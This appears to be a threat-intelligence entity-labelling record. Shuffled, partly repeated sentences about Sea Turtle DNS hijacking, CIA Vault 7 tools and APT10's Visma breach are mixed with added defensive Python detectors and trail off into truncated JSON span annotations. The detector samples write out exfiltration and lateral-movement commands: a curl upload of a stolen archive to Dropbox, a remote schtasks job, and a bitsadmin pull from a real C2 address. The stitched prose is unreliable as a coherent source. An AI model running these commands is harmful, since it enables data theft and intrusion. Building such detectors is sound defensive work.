As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server . In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . We assess with high confidence that Cafax was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . Obtaining access to these ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . These actors perform DNS hijacking through the use of actor-controlled name servers . Sea Turtle has been more aggressive in its pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . These actors use Let's Encrypt , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . We believe that the Sea Turtle campaign continues to be highly successful for several reasons . Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . 
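The Sea Turtle passages above turn on two controls : the NS delegation held at the registrar (which the actor rewrote to point at its own name servers) and registrar or registry locks (which , as noted , would have stopped the redirection) . The Python below is an added example for this page , not Cisco Talos code ; it audits one domain against a known-good NS set and A record , compares the parent-zone delegation with the NS set the zone itself serves , and parses the EPP status lines of a WHOIS text dump for lock flags . The domain , name servers , addresses and WHOIS text are constructed sample inputs , not real infrastructure .

```python
from dataclasses import dataclass

# EPP status codes: client* locks are set at the registrar (registrar lock), server* locks
# at the registry (registry lock). Without them a stolen registrar credential is enough
# to rewrite the delegation.
CLIENT_LOCKS = {'clientUpdateProhibited', 'clientTransferProhibited', 'clientDeleteProhibited'}
SERVER_LOCKS = {'serverUpdateProhibited', 'serverTransferProhibited', 'serverDeleteProhibited'}


@dataclass
class Finding:
    domain: str
    severity: str
    detail: str


def parse_whois_statuses(whois_text):
    # Collect the EPP status tokens from every 'Domain Status:' line of a WHOIS text dump.
    statuses = set()
    for line in whois_text.splitlines():
        key, sep, value = line.partition(':')
        if sep and key.strip().lower() == 'domain status':
            token = value.strip().split()
            if token:
                statuses.add(token[0])
    return statuses


def normalize(names):
    return {n.lower().rstrip('.') for n in names}


def check_delegation(domain, expected_ns, parent_ns, child_ns):
    # The NS set published by the parent zone is what the registrar-side change alters,
    # so it is compared against the known-good set; a parent/child NS mismatch is a
    # second, independent signal.
    expected, parent, child = normalize(expected_ns), normalize(parent_ns), normalize(child_ns)
    findings = []
    if parent != expected:
        findings.append(Finding(domain, 'critical',
                                'parent-zone NS delegation changed: expected %s, observed %s'
                                % (sorted(expected), sorted(parent))))
    if child != parent:
        findings.append(Finding(domain, 'high',
                                'NS set served by the zone differs from the parent delegation: %s vs %s'
                                % (sorted(child), sorted(parent))))
    return findings


def check_records(domain, expected_a, observed_a):
    # A hijacked delegation is used to point hosts at an actor-controlled MitM server.
    unexpected = sorted(set(observed_a) - set(expected_a))
    if unexpected:
        return [Finding(domain, 'critical', 'A record points at unexpected address(es) %s' % unexpected)]
    return []


def check_locks(domain, statuses):
    findings = []
    if not statuses & CLIENT_LOCKS:
        findings.append(Finding(domain, 'medium', 'no registrar lock (client*Prohibited) set'))
    if not statuses & SERVER_LOCKS:
        findings.append(Finding(domain, 'low', 'no registry lock (server*Prohibited) set'))
    return findings


def audit(domain, expected_ns, parent_ns, child_ns, expected_a, observed_a, whois_text):
    return (check_delegation(domain, expected_ns, parent_ns, child_ns)
            + check_records(domain, expected_a, observed_a)
            + check_locks(domain, parse_whois_statuses(whois_text)))


# Constructed sample inputs: a domain whose registrar-side NS set now includes an
# attacker name server, with no locks on the registration, and a locked baseline.
EXPECTED_NS = ['ns1.example-hosting.net', 'ns2.example-hosting.net']
HIJACKED_PARENT_NS = ['ns1.example-hosting.net', 'ns1.attacker-dns.example']
WHOIS_UNLOCKED = '''Domain Name: MINISTRY.EXAMPLE
Registrar: Example Registrar Ltd
Domain Status: ok https://icann.org/epp#ok'''
WHOIS_LOCKED = '''Domain Name: MINISTRY.EXAMPLE
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited'''

if __name__ == '__main__':
    for f in audit('ministry.example', EXPECTED_NS, HIJACKED_PARENT_NS, EXPECTED_NS,
                   ['198.51.100.10'], ['192.0.2.50'], WHOIS_UNLOCKED):
        print(f.severity.upper(), f.domain, f.detail)
```

In practice the parent NS set comes from a query to the TLD's name servers , the child set from querying the delegated servers directly , and the status lines from the registrar's WHOIS or RDAP output ; the comparison logic is the same .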
The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . If the user enables macros to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . The script creates a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macros for files from unknown sources . The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should be analyzed , disarmed and published . These redactions include tens of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . 
The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Weibo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk areas ( Brutal Kangaroo ) and to keep its malware infestations going . 
Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone , at the expense of leaving everyone hackable . Once in Frankfurt , CIA hackers can travel without further border checks to the 25 European countries that are part of the Schengen open border area \u2014 including France , Italy and Switzerland . A number of the CIA's electronic attack methods are designed for physical proximity . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . The attacker then infects and exfiltrates data to removable media . As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . For example , the CIA attack system Fine Dining provides 24 decoy applications for CIA spies to use . For example , Comodo was defeated by CIA malware placing itself in the Windows Recycle Bin . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . 
This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . Its configuration utilities like Margarita allow the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionnaires . HIVE is a multi-platform CIA malware suite and its associated control software . A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn\u2019t be surprising they are the work of the group described in Kaspersky\u2019s \u201cWinnti \u2013 More than just a game\u201d . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . 
APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated it to a Dropbox account using the cURL for Windows command-line tool . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . We assess with high confidence that these incidents were conducted by APT10 , also known as Stone Panda , menuPass , or CVNX , in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed \u201cOperation Cloud Hopper , \u201d against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . The backdoor was deployed using the Notepad++ updater and sideloading a malicious DLL , as noted in APT10\u2019s targeting of Japanese corporations in July 2018 . That attack was attributed to perpetrators Kaspersky called the Winnti Group . APT10 is a threat actor that has been active since at least 2009 . 
APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co. Ltd. and Laoying Baichen Instruments Equipment Co. Ltd . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . The December APT10 indictment noted that the group\u2019s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States . In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . 
In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers\u2019 networks . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . During this operation (dubbed \u201cCloud Hopper\u201d because of the group\u2019s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes) as well as some familiar old tools . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China\u2019s civilian human intelligence agency . The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . Recorded Future\u2019s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group\u2019s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . 
In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . Initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints followed within two weeks of initial access . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus , which had its C2 communications encrypted using the Salsa20 and RC4 ciphers instead of the RC4-only encryption of the more common Trochilus variant seen in the wild . This sample , like other Trochilus samples , was deployed using a DLL sideloading method that relies on three files uploaded to the same folder on the victim machine , as described in US-CERT advisory TA17-117A , last revised on December 20 , 2018 . The sideloaded DLL then uses the configuration file to load the Trochilus payload into memory by injecting it into a valid system process . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . They also identified broadly similar TTPs being used in the attack against a U.S. law firm specializing in intellectual property law . Rapid7\u2019s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 . 
In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by APT10 shared naming similarities as well : 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor , also known as ANEL . APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . APT10 actors gained initial access to the Visma network around August 17 , 2018 . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 , the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading technique . This means that APT10 actors had two separate access points into the Visma network . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . Other examples of malicious infrastructure registered with internet.bs include domains for APT28\u2019s VPNFilter malware campaign and the cyber-berkut[.]org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . 
KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . The attacker gained access to the victim\u2019s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . Rapid7 again observed APT10 dropping payloads named \u201cccSEUPDT.exe\u201d . The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known-good binaries that had DLL search order hijacking issues . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 . APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using the task scheduler to execute the batch script , and finally , deleting the batch script . For exfiltration of stolen data , APT10 used WinRAR , renaming \u201crar.exe\u201d to \u201cr.exe\u201d to create archives , uploaded them with \u201ccurl.exe\u201d (renamed to \u201cc.exe\u201d) , and again used the cloud storage provider Dropbox . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . 
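The sideloading chain described in the Visma and law-firm intrusions above (a trusted host such as the Notepad++ updater gup.exe loading a malicious libcurl.dll from its own directory, with a third file beside them that carries the payload) can be checked in two places: image-load telemetry and the staging directory itself. The following is an added example written for this page, not code from Recorded Future, Rapid7 or the report. The image-load records and file contents are constructed; the Notepad++ install directory, the known-good hash value and the file name gup.dat are assumptions; and the field names only mirror Sysmon Event ID 7.

```python
'''Added example: flag APT10-style DLL sideloading from image-load telemetry and
from the on-disk three-file layout (host EXE, loader DLL, encrypted payload).
Not code from the report; events, file contents, paths and hashes are constructed.'''
import math
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Host executables abused as sideloading vehicles and the DLL each resolves from
# its own directory. gup.exe -> libcurl.dll is the pair named in the report; the
# directory gup.exe normally lives in is an assumption for this example.
SIDELOAD_HOSTS = {
    'gup.exe': {'dll': 'libcurl.dll', 'home': 'c:/program files/notepad++/updater'},
}

# SHA-256 of the DLL the vendor actually ships (placeholder digest, not a real hash).
KNOWN_GOOD_DLL_SHA256 = {'libcurl.dll': {'a' * 64}}


@dataclass
class ImageLoad:
    '''Subset of a Sysmon Event ID 7 record; either slash style is accepted.'''
    image: str         # the process doing the loading
    image_loaded: str  # the DLL that was mapped
    sha256: str        # SHA256 part of the Hashes field


def _dir(path: str) -> str:
    return PureWindowsPath(path).parent.as_posix().lower()


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_image_load(ev: ImageLoad) -> Optional[str]:
    '''Return an alert reason, or None when the load is the vendor-shipped DLL.'''
    host, dll = _name(ev.image), _name(ev.image_loaded)
    profile = SIDELOAD_HOSTS.get(host)
    if profile is None or dll != profile['dll']:
        return None
    if _dir(ev.image) != _dir(ev.image_loaded):
        return None  # resolved from elsewhere, so not sideloaded beside the host
    if ev.sha256.lower() in KNOWN_GOOD_DLL_SHA256.get(dll, set()):
        return None
    if _dir(ev.image) != profile['home']:
        return f'{host} relocated to {_dir(ev.image)} sideloaded unknown {dll}'
    return f'{host} loaded {dll} with unrecognised hash {ev.sha256[:12]}'


def scan_image_loads(events: List[ImageLoad]) -> List[str]:
    return [r for r in (check_image_load(e) for e in events) if r]


def shannon_entropy(data: bytes) -> float:
    '''Bits per byte; encrypted or compressed data sits near 8.0.'''
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_sideload_dir(files: Dict[str, bytes]) -> List[str]:
    '''Flag a directory holding a known host EXE, its hijackable DLL, and at least
    one non-PE file with near-random content (the encrypted payload or config).'''
    names = {n.lower(): b for n, b in files.items()}
    findings = []
    for host, profile in SIDELOAD_HOSTS.items():
        dll = profile['dll']
        if host not in names or dll not in names:
            continue
        if not (names[host].startswith(b'MZ') and names[dll].startswith(b'MZ')):
            continue
        blobs = sorted(n for n, b in names.items()
                       if n not in (host, dll) and not b.startswith(b'MZ')
                       and shannon_entropy(b) > 7.5)
        if blobs:
            findings.append(f'{host} + {dll} + encrypted blob {blobs}')
    return findings


# Constructed telemetry: a clean Notepad++ install, the pair relocated into the
# ProgramData staging directory named in the report, and unrelated noise.
SAMPLE_LOADS = [
    ImageLoad('C:/Program Files/Notepad++/updater/gup.exe',
              'C:/Program Files/Notepad++/updater/libcurl.dll', 'a' * 64),
    ImageLoad('C:/ProgramData/temp/gup.exe',
              'C:/ProgramData/temp/libcurl.dll', 'b' * 64),
    ImageLoad('C:/Windows/System32/notepad.exe',
              'C:/Windows/System32/kernel32.dll', 'c' * 64),
]

# Constructed listing: two PE stubs, a uniformly distributed blob standing in for
# the encrypted third file (gup.dat is a hypothetical name), and a text file.
SAMPLE_DIR = {
    'gup.exe': b'MZ' + bytes(64),
    'libcurl.dll': b'MZ' + bytes(64),
    'gup.dat': bytes(range(256)) * 4,
    'readme.txt': b'Notepad++ updater ' * 8,
}

if __name__ == '__main__':
    for reason in scan_image_loads(SAMPLE_LOADS):
        print('ALERT', reason)
    for finding in triage_sideload_dir(SAMPLE_DIR):
        print('TRIAGE', finding)
```

The known-good hash set is the control that matters: a vendor-shipped libcurl.dll beside gup.exe is expected, so the rule fires only when the DLL is unrecognised, and it names the relocation explicitly when the pair has been copied into a staging directory such as ProgramData. The entropy check will also pick up compressed archives like ss.rar, so its output is a triage lead rather than a verdict.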
Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S. Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . 
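The lateral-movement and exfiltration steps above (renamed rar.exe and curl.exe, uploads to the Dropbox API, 1.bat executed through a remote scheduled task, and BITSAdmin pulling tools from the C2 at 173.254.236[.]158) each leave a process-creation record. The block below is an added example for this page, not code from Rapid7, Recorded Future or the report: it matches constructed Sysmon Event ID 1 style records against those steps and refangs the report's indicator at load time. The target host, task name, token and paths in the sample events are invented.

```python
'''Added example: match process-creation telemetry against the APT10 tradecraft
described above (renamed rar/curl, Dropbox API uploads, scheduled-task lateral
movement with 1.bat, BITSAdmin pulls from the reported C2). Not code from the
report; the events below are constructed and mirror Sysmon Event ID 1 fields.'''
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Tuple

# Tools the report says were renamed before use (rar.exe -> r.exe, curl.exe -> c.exe).
TRACKED_ORIGINAL_NAMES = {'rar.exe', 'curl.exe'}


def refang(ioc: str) -> str:
    '''Turn a defanged indicator back into a matchable form.'''
    return ioc.replace('[.]', '.')


# C2 address from the report, kept defanged in the rule and refanged on load.
C2_HOSTS = {refang('173.254.236[.]158')}

URL_HOST = re.compile(r'https?://([^/\s:]+)', re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str               # Sysmon Image
    original_file_name: str  # Sysmon OriginalFileName, taken from the PE version resource
    command_line: str        # Sysmon CommandLine


def classify(ev: ProcessEvent) -> List[str]:
    '''Return every tradecraft match for one event (empty list means nothing seen).'''
    img = PureWindowsPath(ev.image).name.lower()
    orig = ev.original_file_name.lower()
    cl_l = f' {ev.command_line.lower()} '  # padded so token checks match at the edges
    hits = []
    # Renaming the file does not change the version resource, so compare the two.
    if orig in TRACKED_ORIGINAL_NAMES and img != orig:
        hits.append(f'renamed tool: {img} is {orig}')
    if orig == 'curl.exe' and 'dropboxapi.com' in cl_l:
        hits.append('curl upload to the Dropbox API')
    # schtasks /create against a remote system (/s) that runs a batch script.
    if img == 'schtasks.exe' and ' /create ' in cl_l and ' /s ' in cl_l and '.bat' in cl_l:
        hits.append('remote scheduled task running a batch script')
    # bitsadmin /transfer from a known C2 is a strong signal; any other remote
    # source is still worth surfacing.
    if img == 'bitsadmin.exe' and ' /transfer ' in cl_l:
        hosts = URL_HOST.findall(ev.command_line)
        known = [h for h in hosts if h in C2_HOSTS]
        if known:
            hits.append(f'bitsadmin download from known C2 {known[0]}')
        elif hosts:
            hits.append(f'bitsadmin download from {hosts[0]}')
    return hits


def scan(events: List[ProcessEvent]) -> List[Tuple[str, List[str]]]:
    '''Events that matched at least one rule, paired with their reasons.'''
    out = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            out.append((PureWindowsPath(ev.image).name, reasons))
    return out


# Constructed events; file names, staging path and C2 address follow the report,
# everything else (host 10.0.0.5, task name, token, document path) is invented.
SAMPLE_EVENTS = [
    ProcessEvent(r'C:\ProgramData\temp\r.exe', 'Rar.exe',
                 r'r.exe a -r ss.rar C:\Users\finance\Documents'),
    ProcessEvent(r'C:\ProgramData\temp\c.exe', 'curl.exe',
                 'c.exe -X POST https://content.dropboxapi.com/2/files/upload '
                 '-H Authorization:Bearer_TOKEN --data-binary @ss.rar'),
    ProcessEvent(r'C:\Windows\System32\schtasks.exe', 'schtasks.exe',
                 r'schtasks /create /s 10.0.0.5 /tn sys /tr C:\ProgramData\temp\1.bat'
                 ' /sc once /st 02:00 /ru SYSTEM'),
    ProcessEvent(r'C:\Windows\System32\bitsadmin.exe', 'bitsadmin.exe',
                 'bitsadmin /transfer job /download /priority high'
                 r' http://173.254.236.158/cu.exe C:\ProgramData\temp\cu.exe'),
    ProcessEvent(r'C:\Program Files\Git\mingw64\bin\curl.exe', 'curl.exe',
                 'curl.exe https://example.com/'),
]

if __name__ == '__main__':
    for name, reasons in scan(SAMPLE_EVENTS):
        print(name, '->', '; '.join(reasons))
```

OriginalFileName comes from the PE version resource, so renaming rar.exe to r.exe does not change it; that is why the rule compares it with the on-disk name instead of looking for r.exe or c.exe directly, which the next campaign would simply rename again. The refang step lets the indicator list stay defanged at rest, as it is quoted in the report, without making the comparison fail at run time.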
This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains .", "spans": [{"start": 64, "end": 73, "label": "Organization"}, {"start": 101, "end": 110, "label": "Organization"}, {"start": 140, "end": 153, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 274, "end": 288, "label": "Organization"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 514, "end": 535, "label": "Malware"}, {"start": 542, "end": 551, "label": "Malware"}, {"start": 552, "end": 561, "label": "Malware"}, {"start": 572, "end": 583, "label": "Malware"}, {"start": 586, "end": 600, "label": "Malware"}, {"start": 607, "end": 621, "label": "Malware"}, {"start": 622, "end": 629, "label": "Malware"}, {"start": 630, "end": 635, "label": "Malware"}, {"start": 648, "end": 655, "label": "Organization"}, {"start": 693, "end": 705, "label": "Malware"}, {"start": 761, "end": 781, "label": "Malware"}, {"start": 785, "end": 792, "label": "Organization"}, {"start": 884, "end": 891, "label": "Organization"}, {"start": 1005, "end": 1019, "label": "Organization"}, {"start": 1071, "end": 1078, "label": "Organization"}, {"start": 1110, "end": 1131, "label": "Malware"}, {"start": 1140, "end": 1152, "label": "Malware"}, {"start": 1302, "end": 1309, "label": "Vulnerability"}, {"start": 1350, "end": 1357, "label": "Malware"}, {"start": 1358, "end": 1365, "label": "Malware"}, {"start": 1402, "end": 1410, "label": "Indicator"}, {"start": 1458, "end": 1465, "label": "Indicator"}, {"start": 1468, "end": 1476, "label": "Indicator"}, {"start": 1530, "end": 1551, "label": "Malware"}, {"start": 1554, "end": 1566, "label": "Indicator"}, {"start": 1680, "end": 1688, "label": "Indicator"}, {"start": 1689, "end": 1696, "label": "Vulnerability"}, {"start": 1852, "end": 1860, "label": "Malware"}, {"start": 1886, "end": 1907, "label": "Malware"}, {"start": 1910, "end": 1918, "label": 
"Indicator"}, {"start": 2034, "end": 2042, "label": "Indicator"}, {"start": 2121, "end": 2129, "label": "Indicator"}, {"start": 2184, "end": 2192, "label": "Indicator"}, {"start": 2223, "end": 2228, "label": "Indicator"}, {"start": 2229, "end": 2237, "label": "Indicator"}, {"start": 2297, "end": 2315, "label": "Malware"}, {"start": 2316, "end": 2322, "label": "Malware"}, {"start": 2372, "end": 2380, "label": "Indicator"}, {"start": 2389, "end": 2397, "label": "Organization"}, {"start": 2471, "end": 2479, "label": "Vulnerability"}, {"start": 2509, "end": 2518, "label": "Organization"}, {"start": 2521, "end": 2530, "label": "Indicator"}, {"start": 2619, "end": 2627, "label": "Vulnerability"}, {"start": 2664, "end": 2672, "label": "Organization"}, {"start": 2673, "end": 2688, "label": "Vulnerability"}, {"start": 2715, "end": 2722, "label": "System"}, {"start": 2767, "end": 2775, "label": "Organization"}, {"start": 2806, "end": 2815, "label": "Indicator"}, {"start": 2967, "end": 2982, "label": "Indicator"}, {"start": 2983, "end": 2999, "label": "Malware"}, {"start": 3002, "end": 3015, "label": "Vulnerability"}, {"start": 3043, "end": 3050, "label": "Vulnerability"}, {"start": 3051, "end": 3071, "label": "Indicator"}, {"start": 3076, "end": 3095, "label": "Indicator"}, {"start": 3171, "end": 3178, "label": "Vulnerability"}, {"start": 3186, "end": 3200, "label": "Indicator"}, {"start": 3214, "end": 3228, "label": "Indicator"}, {"start": 3235, "end": 3242, "label": "Vulnerability"}, {"start": 3247, "end": 3260, "label": "Indicator"}, {"start": 3378, "end": 3398, "label": "Malware"}, {"start": 3435, "end": 3443, "label": "Vulnerability"}, {"start": 3502, "end": 3511, "label": "Organization"}, {"start": 3527, "end": 3546, "label": "Malware"}, {"start": 3564, "end": 3573, 